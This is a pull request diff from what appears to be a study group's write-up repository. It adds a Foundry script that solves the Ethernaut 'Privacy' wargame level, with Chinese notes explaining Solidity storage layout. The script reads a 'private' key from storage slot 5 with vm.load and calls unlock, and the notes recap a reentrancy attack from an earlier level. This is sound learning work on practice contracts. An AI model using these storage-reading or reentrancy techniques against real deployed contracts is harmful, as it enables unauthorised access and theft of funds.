Merge pull request #954 from nghdavid/main

2024/09/21 note

Writeup/nghdavid/Ethernaut/11/11.sol

@@ -0,0 +1,34 @@
+// SPDX-License-Identifier: MIT
+pragma solidity 0.8.21;
+
+import {Script, console2} from "forge-std/Script.sol";
+import {EthernautHelper} from "../setup/EthernautHelper.sol";
+
+// NOTE You can import your helper contracts & create interfaces here
+
+contract PrivacySolution is Script, EthernautHelper {
+    address constant LEVEL_ADDRESS = 0x131c3249e115491E83De375171767Af07906eA36;
+    uint256 heroPrivateKey = vm.envUint("PRIVATE_KEY");
+
+    function run() public {
+        vm.startBroadcast(heroPrivateKey);
+        // NOTE this is the address of your challenge contract
+        address challengeInstance = createInstance(LEVEL_ADDRESS);
+
+        // YOUR SOLUTION HERE
+
+        /**
+         * Understanding Solidity’s Storage Layout And How To Access State Variables In Storage Slots.
+         */
+        bytes32 key = vm.load(challengeInstance, bytes32(uint256(5)));
+        challengeInstance.call(abi.encodeWithSignature("unlock(bytes16)", bytes16(key)));
+
+
+        // SUBMIT CHALLENGE. (DON'T EDIT)
+        bool levelSuccess = submitInstance(challengeInstance);
+        require(levelSuccess, "Challenge not passed yet");
+        vm.stopBroadcast();
+
+        console2.log(successMessage(12));
+    }
+}

nghdavid.md

@@ -369,5 +369,15 @@ abstract contract ReentrancyGuard {
 - 首先要呼叫關卡合約的donate()，讓攻擊者的balance有值
 - 再呼叫關卡合約的withdraw()，讓重入攻擊一直重複到balance < 0
 
+### 2024.09.21
+# Ethernut第十二題
+- 這題的關鍵是要找到data[2]的值做為key
+- 但data為private varible，所以用vm.load去讀取
+- bool佔據1個byte，在storage slot 0
+- ID為uint256，佔據32byte，在storage slot 1
+- flattening、denomination、awkwardness，加起來佔據32byte，在storage slot 2
+- data的type為bytes32[]，所以每一個值會對應到一個slot
+- data[0]對應到slot3，data[1]對應到slot4，data[2]對應到slot5
+- 所以key在slot5，用vm.load(challengeInstance, bytes32(uint256(5)))就能讀取出來key
 
 <!-- Content_END -->